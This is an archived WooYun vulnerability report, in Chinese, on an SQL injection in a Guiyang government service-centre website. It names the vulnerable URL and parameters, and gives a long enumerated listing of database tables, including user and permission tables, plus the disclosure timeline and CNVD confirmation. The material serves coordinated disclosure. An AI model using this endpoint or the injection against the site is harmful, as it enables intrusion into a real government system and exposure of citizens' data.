乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-07: 细节已通知厂商并且等待厂商处理中 2015-04-10: 厂商已经确认,细节仅向厂商公开 2015-04-20: 细节向核心白帽子及相关领域专家公开 2015-04-30: 细节向普通白帽子公开 2015-05-10: 细节向实习白帽子公开 2015-05-25: 细节向公众公开
贵阳市人民政府服务中心存在SQL注射。泄露大量表
漏洞存在于服务中心某处
http://www.gyasc.gov.cn:8088/application/zwgk/xzzhinanxiang.jsp?ZJJGDM=009400086&dname=%CA%D0%C1%B8%CA%B3%BE%D6 (GET)
Database: distribution[87 tables]+------------------------+| MSarticles || MSarticles || MSarticles || MSdistribution_agents || MSdistribution_agents || MSdistribution_agents || MSdistribution_history || MSdistribution_history || MSdistribution_history || MSdistribution_status || MSdistribution_status || MSdistribution_status || MSlogreader_agents || MSlogreader_agents || MSlogreader_agents || MSlogreader_history || MSlogreader_history || MSlogreader_history || MSmerge_agents || MSmerge_agents || MSmerge_agents || MSmerge_history || MSmerge_history || MSmerge_history || MSmerge_subscriptions || MSmerge_subscriptions || MSmerge_subscriptions || MSpublication_access || MSpublication_access || MSpublication_access || MSpublications || MSpublications || MSpublications || MSpublisher_databases || MSpublisher_databases || MSpublisher_databases || MSqreader_agents || MSqreader_agents || MSqreader_agents || MSqreader_history || MSqreader_history || MSqreader_history || MSrepl_backup_lsns || MSrepl_backup_lsns || MSrepl_backup_lsns || MSrepl_commands || MSrepl_commands || MSrepl_commands || MSrepl_errors || MSrepl_errors || MSrepl_errors || MSrepl_identity_range || MSrepl_identity_range || MSrepl_identity_range || MSrepl_originators || MSrepl_originators || MSrepl_originators || MSrepl_transactions || MSrepl_transactions || MSrepl_transactions || MSrepl_version || MSrepl_version || MSrepl_version || MSsnapshot_agents || MSsnapshot_agents || MSsnapshot_agents || MSsnapshot_history || MSsnapshot_history || MSsnapshot_history || MSsubscriber_info || MSsubscriber_info || MSsubscriber_info || MSsubscriber_schedule || MSsubscriber_schedule || MSsubscriber_schedule || MSsubscriptions || MSsubscriptions || MSsubscriptions || MSsync_states || MSsync_states || MSsync_states || sysconstraints || sysconstraints || sysconstraints || syssegments || syssegments || syssegments |+------------------------+
Database: web[369 tables]+-----------------------------+| D99_CMD || D99_CMD || D99_CMD || D99_Tmp || D99_Tmp || D99_Tmp || T_APPLICANT || T_APPLICANT || T_APPLICANT || T_BMB || T_BMB || T_BMB || T_BUSIITEM || T_BUSIITEM || T_BUSIITEM || T_BUSINESS || T_BUSINESS || T_BUSINESS || T_CKGLB || T_CKGLB || T_CKGLB || T_DCB || T_DCB || T_DCB || T_DJL || T_DJL || T_DJL || T_DOCCONFIG || T_DOCCONFIG || T_DOCCONFIG || T_DOCCONFIG$ || T_DOCCONFIG$ || T_DOCCONFIG$ || T_DPB || T_DPB || T_DPB || T_FFB || T_FFB || T_FFB || T_FJB || T_FJB || T_FJB || T_GROUPOFUSER || T_GROUPOFUSER || T_GROUPOFUSER || T_GUANGRONGBANG || T_GUANGRONGBANG || T_GUANGRONGBANG || T_HFB || T_HFB || T_HFB || T_INFORMATION || T_INFORMATION || T_INFORMATION || T_JC_JXCPJGB || T_JC_JXCPJGB || T_JC_JXCPJGB || T_JC_TS_GRSF || T_JC_TS_GRSF || T_JC_TS_GRSF || T_JC_TS_TSLX || T_JC_TS_TSLX || T_JC_TS_TSLX || T_JC_TS_TSWTFL || T_JC_TS_TSWTFL || T_JC_TS_TSWTFL || T_JC_TS_XB || T_JC_TS_XB || T_JC_TS_XB || T_JC_TS_XZXWLX || T_JC_TS_XZXWLX || T_JC_TS_XZXWLX || T_JC_TS_YESORNO || T_JC_TS_YESORNO || T_JC_TS_YESORNO || T_JC_XZXK_BANJIE || T_JC_XZXK_BANJIE || T_JC_XZXK_BANJIE || T_JC_XZXK_BUSIINDEX || T_JC_XZXK_BUSIINDEX || T_JC_XZXK_BUSIINDEX || T_JC_XZXK_BUSI_TIMELIMIT || T_JC_XZXK_BUSI_TIMELIMIT || T_JC_XZXK_BUSI_TIMELIMIT || T_JC_XZXK_PERMISSIONITEMSYS || T_JC_XZXK_PERMISSIONITEMSYS || T_JC_XZXK_PERMISSIONITEMSYS || T_JC_XZXK_SHOULI || T_JC_XZXK_SHOULI || T_JC_XZXK_SHOULI || T_LOG || T_LOG || T_LOG || T_LYB || T_LYB || T_LYB || T_MENU || T_MENU || T_MENU || T_NOTICEUSER || T_NOTICEUSER || T_NOTICEUSER || T_OL_BUSIDEAL || T_OL_BUSIDEAL || T_OL_BUSIDEAL || T_OL_DIANZIWENDANG || T_OL_DIANZIWENDANG || T_OL_DIANZIWENDANG || T_OL_EDOCUMENT || T_OL_EDOCUMENT || T_OL_EDOCUMENT || T_OL_LISHIZHUANGTAI || T_OL_LISHIZHUANGTAI || T_OL_LISHIZHUANGTAI || T_OL_SHENQINGBIANHAO || T_OL_SHENQINGBIANHAO || T_OL_SHENQINGBIANHAO || T_OL_SHENQINGFANGZILIAO || T_OL_SHENQINGFANGZILIAO || T_OL_SHENQINGFANGZILIAO || T_OL_XIANSHIXINXIPEIZHI || T_OL_XIANSHIXINXIPEIZHI || T_OL_XIANSHIXINXIPEIZHI || T_OL_YEWUSHENQING || T_OL_YEWUSHENQING || T_OL_YEWUSHENQING || T_ONLINEUSER || T_ONLINEUSER || T_ONLINEUSER || T_PAGE || T_PAGE || T_PAGE || T_PERMISSIONITEM3 || T_PERMISSIONITEM3 || T_PERMISSIONITEM3 || T_PERMISSIONITEM4 || T_PERMISSIONITEM4 || T_PERMISSIONITEM4 || T_PERMISSIONITEMSYS || T_PERMISSIONITEMSYS || T_PERMISSIONITEMSYS || T_PERMISSIONITEMSYS2 || T_PERMISSIONITEMSYS2 || T_PERMISSIONITEMSYS2 || T_PERMISSIONITEMSYS24 || T_PERMISSIONITEMSYS24 || T_PERMISSIONITEMSYS24 || T_PERMISSIONITEMSYS_YBF || T_PERMISSIONITEMSYS_YBF || T_PERMISSIONITEMSYS_YBF || T_PHONEOPEN || T_PHONEOPEN || T_PHONEOPEN || T_POWER || T_POWER || T_POWER || T_POWEROFGROUP || T_POWEROFGROUP || T_POWEROFGROUP || T_POWEROFPAGE || T_POWEROFPAGE || T_POWEROFPAGE || T_POWEROFUSER || T_POWEROFUSER || T_POWEROFUSER || T_PROJECT_ZDSX || T_PROJECT_ZDSX || T_PROJECT_ZDSX || T_PY || T_PY || T_PY || T_QUESTIONNAIRE || T_QUESTIONNAIRE || T_QUESTIONNAIRE || T_QYJMBSB_FL || T_QYJMBSB_FL || T_QYJMBSB_FL || T_QYJMBSB_SL || T_QYJMBSB_SL || T_QYJMBSB_SL || T_QYJMBSB_ZL || T_QYJMBSB_ZL || T_QYJMBSB_ZL || T_SATISFYANSWER || T_SATISFYANSWER || T_SATISFYANSWER || T_SATISFYINQUIRE || T_SATISFYINQUIRE || T_SATISFYINQUIRE || T_SATISFYMARK || T_SATISFYMARK || T_SATISFYMARK || T_SATISFYSUBJECT || T_SATISFYSUBJECT || T_SATISFYSUBJECT || T_SATISFYTEL || T_SATISFYTEL || T_SATISFYTEL || T_SCORE_DEPART || T_SCORE_DEPART || T_SCORE_DEPART || T_SCORE_DEPART_RELEASE || T_SCORE_DEPART_RELEASE || T_SCORE_DEPART_RELEASE || T_SCORE_RELEASE || T_SCORE_RELEASE || T_SCORE_RELEASE || T_SL_DOCUMENT || T_SL_DOCUMENT || T_SL_DOCUMENT || T_SPITEMOFBUSIITEM || T_SPITEMOFBUSIITEM || T_SPITEMOFBUSIITEM || T_SPSX || T_SPSX || T_SPSX || T_SQL_ERR || T_SQL_ERR || T_SQL_ERR || T_SURVEY || T_SURVEY || T_SURVEY || T_SXTJBB || T_SXTJBB || T_SXTJBB || T_SYS_DEPARTMENT || T_SYS_DEPARTMENT || T_SYS_DEPARTMENT || T_SYS_DUTY || T_SYS_DUTY || T_SYS_DUTY || T_TEMPLATE || T_TEMPLATE || T_TEMPLATE || T_TEMP_SPSX || T_TEMP_SPSX || T_TEMP_SPSX || T_TOPIC || T_TOPIC || T_TOPIC || T_TOPICREPLY || T_TOPICREPLY || T_TOPICREPLY || T_TSCLB || T_TSCLB || T_TSCLB || T_TSDJATTACH || T_TSDJATTACH || T_TSDJATTACH || T_TSDJB || T_TSDJB || T_TSDJB || T_TSSLB || T_TSSLB || T_TSSLB || T_TSTYPE || T_TSTYPE || T_TSTYPE || T_USER || T_USER || T_USER || T_USERGROUP || T_USERGROUP || T_USERGROUP || T_VOTE || T_VOTE || T_VOTE || T_VOTEITEM || T_VOTEITEM || T_VOTEITEM || T_VOTEITEMCONTENT || T_VOTEITEMCONTENT || T_VOTEITEMCONTENT || T_VOTERECORD || T_VOTERECORD || T_VOTERECORD || T_VOTERINFO || T_VOTERINFO || T_VOTERINFO || T_WEBGUIDE || T_WEBGUIDE || T_WEBGUIDE || T_XKWD || T_XKWD || T_XKWD || T_ZXJS || T_ZXJS || T_ZXJS || T_forms || T_forms || T_forms || 藵谩拧疟 || 藵谩拧疟 || 藵谩拧疟 || dtproperties || dtproperties || dtproperties || sysconstraints || sysconstraints || sysconstraints || syssegments || syssegments || syssegments || t_Context || t_Context || t_Context || t_applyInformation || t_applyInformation || t_applyInformation || t_company || t_company || t_company || t_department || t_department || t_department || t_department$ || t_department$ || t_department$ || t_displayinfo || t_displayinfo || t_displayinfo || t_displayinfo$ || t_displayinfo$ || t_displayinfo$ || t_displaysubinfo || t_displaysubinfo || t_displaysubinfo || t_displaysubinfo$ || t_displaysubinfo$ || t_displaysubinfo$ || t_document || t_document || t_document || t_duty || t_duty || t_duty || t_dxdiaocha || t_dxdiaocha || t_dxdiaocha || t_dxdiaocha2 || t_dxdiaocha2 || t_dxdiaocha2 || t_key_depment || t_key_depment || t_key_depment || t_key_infotype || t_key_infotype || t_key_infotype || t_permissinitem || t_permissinitem || t_permissinitem || t_permissionitem || t_permissionitem || t_permissionitem || t_permissionitem$ || t_permissionitem$ || t_permissionitem$ || t_person || t_person || t_person || t_suggest || t_suggest || t_suggest || t_sxforms || t_sxforms || t_sxforms || t_zuser || t_zuser || t_zuser |+-----------------------------+
如上
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-04-10 17:45
CNVD确认并复现所述情况,已经转由CNCERT下发给贵州分中心,由其后续协调网站管理单位处置。
暂无